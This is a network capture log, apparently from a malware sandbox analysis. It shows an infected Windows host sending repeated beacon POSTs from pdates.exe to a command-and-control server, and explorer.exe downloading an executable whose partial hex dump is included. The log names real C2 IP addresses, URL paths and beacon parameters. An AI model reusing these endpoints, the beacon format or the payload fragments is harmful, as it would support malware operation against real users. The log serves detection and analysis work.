Jul 27, 2023 01:35:14.562799931 CEST	4117	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:14.611393929 CEST	4117	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
492	192.168.2.5	50213	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:14.885268927 CEST	4118	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:14.934859037 CEST	4118	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
493	192.168.2.5	50214	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:15.105412006 CEST	4119	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:15.160381079 CEST	4119	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
494	192.168.2.5	50215	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:15.317004919 CEST	4120	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:15.365550041 CEST	4120	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
495	192.168.2.5	50216	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:15.555635929 CEST	4121	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:15.603857994 CEST	4121	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
496	192.168.2.5	50217	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:15.792558908 CEST	4122	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:15.840420961 CEST	4122	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
497	192.168.2.5	50218	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:16.004581928 CEST	4123	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:16.052227020 CEST	4123	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
498	192.168.2.5	50219	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:16.224113941 CEST	4124	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:16.271666050 CEST	4124	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
499	192.168.2.5	50220	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:16.431197882 CEST	4125	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:16.479111910 CEST	4125	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49721	77.91.124.47	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:00.295901060 CEST	522	OUT	GET /new/fotod250.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.91.124.47
Jul 27, 2023 01:33:00.340497971 CEST	524	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 27 Jul 2023 07:29:55 GMT Accept-Ranges: bytes ETag: "d55cf235cc0d91:0" Server: Microsoft-IIS/10.0 Date: Thu, 27 Jul 2023 07:32:59 GMT Content-Length: 399360 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 e2 25 87 93 83 4b d4 93 83 4b d4 93 83 4b d4 f6 e5 4e d5 92 83 4b d4 f6 e5 48 d5 92 83 4b d4 f6 e5 4f d5 87 83 4b d4 f6 e5 4a d5 82 83 4b d4 93 83 4a d4 0d 83 4b d4 f6 e5 43 d5 9a 83 4b d4 f6 e5 b4 d4 92 83 4b d4 f6 e5 49 d5 92 83 4b d4 52 69 63 68 93 83 4b d4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 60 8d 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 0d 00 64 00 00 00 b0 05 00 00 00 00 00 60 6a 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 70 06 00 00 04 00 00 c4 3f 06 00 02 00 40 c1 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c a2 00 00 b4 00 00 00 00 c0 00 00 ac 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 88 08 00 00 10 14 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 63 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1a 00 00 00 80 00 00 00 02 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 52 10 00 00 00 a0 00 00 00 12 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 a0 05 00 00 c0 00 00 00 92 05 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 08 00 00 00 60 06 00 00 0a 00 00 00 0e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 82 40 00 50 82 40 00 a4 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KKKNKHKOKJKJKCKKIKRichKPEL`bd`j@p?@ `T@.textcd `.dataHh@.idataRj@@.rsrc\|@@.reloc`@B@P@
Jul 27, 2023 01:33:00.340539932 CEST	525	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 80 40 00 70 14 40 00 01 00 00 00 88 a2 40 00 00 00 00 00 c8 10 40 00 1c 00 00 00 00 75 01 00 00 00 Data Ascii: @p@@@u j@i@@o@012P44BIPJJ`KKLLLO
Jul 27, 2023 01:33:00.340572119 CEST	526	IN	Data Raw: 00 00 04 00 00 00 2e 43 52 54 24 58 49 59 00 00 00 00 c4 10 00 00 04 00 00 00 2e 43 52 54 24 58 49 5a 00 00 00 00 c8 10 00 00 78 00 00 00 2e 67 66 69 64 73 00 00 40 11 00 00 30 03 00 00 2e 72 64 61 74 61 00 00 70 14 00 00 04 00 00 00 2e 72 64 61 Data Ascii: .CRT$XIY.CRT$XIZx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mnr\.xdata$x.datah.bss.idata$5.00cfg.idata$2
Jul 27, 2023 01:33:00.340598106 CEST	528	IN	Data Raw: 33 c0 eb 4f ff 15 cc a1 40 00 8b d0 8b ce e8 9d 29 00 00 68 00 02 00 00 8d 85 fc fd ff ff c6 85 fc fd ff ff 00 50 ff 75 14 ff 35 3c 9a 40 00 ff 15 e8 a1 40 00 8d 85 fc fd ff ff 50 68 3f 08 00 00 56 ff 15 d4 a1 40 00 6a ff ff 15 dc a1 40 00 33 c0 Data Ascii: 3O@)hPu5<@@Ph?V@j@3@M3^bR]UQSVWE30>tFfKuEf03#<7tGf7Kt78t@_^[]U@3EESVE
Jul 27, 2023 01:33:00.340625048 CEST	529	IN	Data Raw: f0 50 68 c4 11 40 00 57 ff 15 20 a0 40 00 57 57 57 8d 45 ec c7 45 ec 01 00 00 00 50 57 ff 75 e8 c7 45 f8 02 00 00 00 ff 15 34 a0 40 00 ff 75 e8 8b f0 ff 15 88 a0 40 00 85 f6 5e 57 75 07 ba f6 04 00 00 eb a9 6a 02 ff 15 d8 a1 40 00 85 c0 75 07 ba Data Ascii: Ph@W @WWWEEPWuE4@u@^Wuj@u3@M3_TM]Suu5ujj@jh@@"3$uf=@@ujj@[[UQ=0@t6EPhjhp@h@uh0@u
Jul 27, 2023 01:33:00.340655088 CEST	530	IN	Data Raw: 00 85 c0 74 78 68 fc 11 40 00 8d 44 24 40 50 ff 15 d4 a0 40 00 85 c0 74 64 8d 44 24 3c 8b d3 50 8d 8c 24 54 01 00 00 e8 5b f2 ff ff 68 40 11 40 00 8b d3 8d 8c 24 54 01 00 00 e8 1f 41 00 00 8d 8c 24 50 01 00 00 e8 19 ff ff ff eb 30 50 8b d3 8d 8c Data Ascii: txh@D$@P@tdD$<P$T[h@@$TA$P0P$T+h$TP@$PP\|@D$PWL@JW@V@$\_^[3H]U@3EVWWP3@tKh@h
Jul 27, 2023 01:33:00.340686083 CEST	532	IN	Data Raw: fe ff ff 85 c0 0f 84 28 01 00 00 8d 45 e4 50 ff 75 f8 ff 15 2c a2 40 00 89 45 e8 85 c0 0f 84 d7 00 00 00 50 6a 42 ff 15 80 a0 40 00 8b f8 85 ff 0f 84 fd 00 00 00 57 ff 15 a0 a0 40 00 89 45 e0 85 c0 0f 84 eb 00 00 00 50 ff 75 e8 ff 75 e4 ff 75 f8 Data Ascii: (EPu,@EPjB@W@EPuuu$@EPEPhD@u(@tt}tnEH@MMUEEEMEvv6DvDv\|]39u\|9u~9u\|e9u`W
Jul 27, 2023 01:33:00.340715885 CEST	533	IN	Data Raw: 00 00 80 3d 3a 8a 40 00 00 74 0f b9 3a 8a 40 00 e8 43 f5 ff ff e9 b4 00 00 00 6a 0a 68 9c 12 40 00 56 ff 15 e0 a0 40 00 85 c0 74 0a 50 56 ff 15 28 a1 40 00 8b f8 83 3d 84 81 40 00 00 74 06 ff 15 3c a0 40 00 83 3d 24 8a 40 00 00 74 05 33 c0 40 eb Data Ascii: =:@t:@Cjh@V@tPV(@=@t<@=$@t3@}\tpf@@3Cf;tftfu?4@t38@u*u!h>hGh@P/6==u33PjPP3M_^3[=]U
Jul 27, 2023 01:33:00.340748072 CEST	534	IN	Data Raw: 3d 6a 04 6a 20 56 53 ba 4a 05 00 00 8b cf e8 68 11 00 00 83 f8 06 0f 85 db 00 00 00 56 53 ff 15 b4 a0 40 00 85 c0 75 16 56 6a 10 56 53 ba cb 04 00 00 8b cf e8 42 11 00 00 e9 c9 00 00 00 68 40 11 40 00 ba 04 01 00 00 8b cb e8 fd 31 00 00 8b cb e8 Data Ascii: =jj VSJhVS@uVjVSBh@@14%uVjVV=@\u=@\t3@P%tn3CSW@d3VjVV@hT@W@3Vhhh5W@f9@@uVh6W@P
Jul 27, 2023 01:33:00.340780973 CEST	536	IN	Data Raw: c0 0f 8f a0 00 00 00 85 c9 75 34 85 c0 8b 85 70 fe ff ff 75 15 0f b7 c8 8b 85 5c fe ff ff 3b 4c 18 08 72 38 3b 4c 18 14 eb 30 8b 8d 5c fe ff ff 0f b7 c0 3b 44 19 08 0f 83 94 00 00 00 eb 1d 85 c0 0f 85 8a 00 00 00 8b 8d 5c fe ff ff 8b 85 70 fe ff Data Ascii: u4pu\;Lr8;L0\;D\p;DvutPL`3P;Tk<``tGX`Lu8Ty\|XPQ
Jul 27, 2023 01:33:00.385076046 CEST	537	IN	Data Raw: da ff ff 33 f6 46 3b de 75 4a 68 04 01 00 00 8d 94 24 94 00 00 00 b9 f8 12 40 00 e8 25 09 00 00 85 c0 74 a5 80 3d 42 8c 40 00 00 0f 85 5f 02 00 00 6a ff 68 c0 12 40 00 6a ff 8d 84 24 9c 00 00 00 50 56 6a 7f ff 15 68 a0 40 00 48 2b c6 0f 84 3c 02 Data Ascii: 3F;uJh$@%t=B@_jh@j$PVjh@H+<D$PD$P$4t$u"3@f9@@t= @tuD$$D=@4@&s@VS@3T$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.5	49767	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:15.342317104 CEST	2895	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:15.390353918 CEST	2895	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
500	192.168.2.5	50221	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:16.647319078 CEST	4126	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:16.695178986 CEST	4126	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
501	192.168.2.5	50222	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:16.899893999 CEST	4127	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:16.950027943 CEST	4127	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
502	192.168.2.5	50223	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:17.130358934 CEST	4127	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:17.177813053 CEST	4128	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
503	192.168.2.5	50224	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:17.332315922 CEST	4128	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:17.379502058 CEST	4129	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
504	192.168.2.5	50225	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:17.541857004 CEST	4129	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
